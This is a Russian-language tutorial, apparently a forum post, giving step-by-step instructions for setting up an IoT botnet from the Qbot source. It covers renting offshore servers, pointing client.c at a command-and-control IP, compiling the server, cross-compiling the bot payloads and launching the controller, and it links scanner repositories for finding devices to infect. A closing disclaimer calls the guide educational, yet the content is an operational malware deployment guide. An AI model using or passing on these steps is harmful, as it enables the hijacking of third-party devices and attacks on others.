Создаём ботнет [Kali Linux]

Нам потребуется:

1) 2 оффшорных сервера с CentOS 6 на борту (для CNC и скана)

2) Опыт работы с линуксом

3) https://github.com/geniosa/qbot

4) https://github.com/701th/LRAB-SCANNER

5) https://github.com/n00dl3z/Python-scanners

(гитхаб блокирует некоторые репозитории, но весь нужный материал можно найти в открытом доступе)

Последние 2 для сканирования и по вашему усмотрению.

Первым делом устанавливаем зависимости:

yum install python gcc perl nano screen git -y

Потом копируем репозиторий:

git clone https://github.com/geniosa/qbot

Дальше нам нужно отредактировать client.c. Лучше всего скачать и отредактировать в Notepad ++, потому что нам потребуется сделать мультизамену. Для этого находим IP под "unsigned char *CommServer()", выделяем его и заменяем везде на IP вашего CNC-сервера. Также запомните номер порта после IP.

Тут уже можно сказать, что половина работы сделана. Нам осталось совсем немного шагов, чтобы запустить наш ботнет.

Компилируем сервер:

gcc -o server server.c -pthread

(на этом шаге gcc выдаст пару варнингов, не пугаемся)

И кросс-компилим бинарники:

python cc7.py client.c <SERVER IP>

cc7.py берем отсюда: https://github.com/n00dl3z/Cross-Compilers/

Обязательно копируем строку после Successfully Cross Compiled - это наш payload на будущее.

Не забываем создать файл login.txt с логином и паролем формата "LOG PASS"

Теперь, когда наш ботнет готов, можем его запускать. Пишем:

screen ./server [порт в client.c] [количество тредов] [ваш порт]

Все, можем коннектиться, для этого пишем

telnet [IP сервера] [ваш порт]

Вот и все, дальше можно покопаться в наших исходниках (client.c, server.c) и настроить под себя. Не забываем пересобирать после модификаций. Итак, сегодня мы настроили простейший и в то же время надежнейший IoT-ботнет. Как видите, ничего сложного в этом нет.

Расширенно тему скана не буду затрагивать, так как это незаконно. Я ни в коем случае не пропагандирую такие действия. Все написанное здесь представлено исключительно в образовательных целях.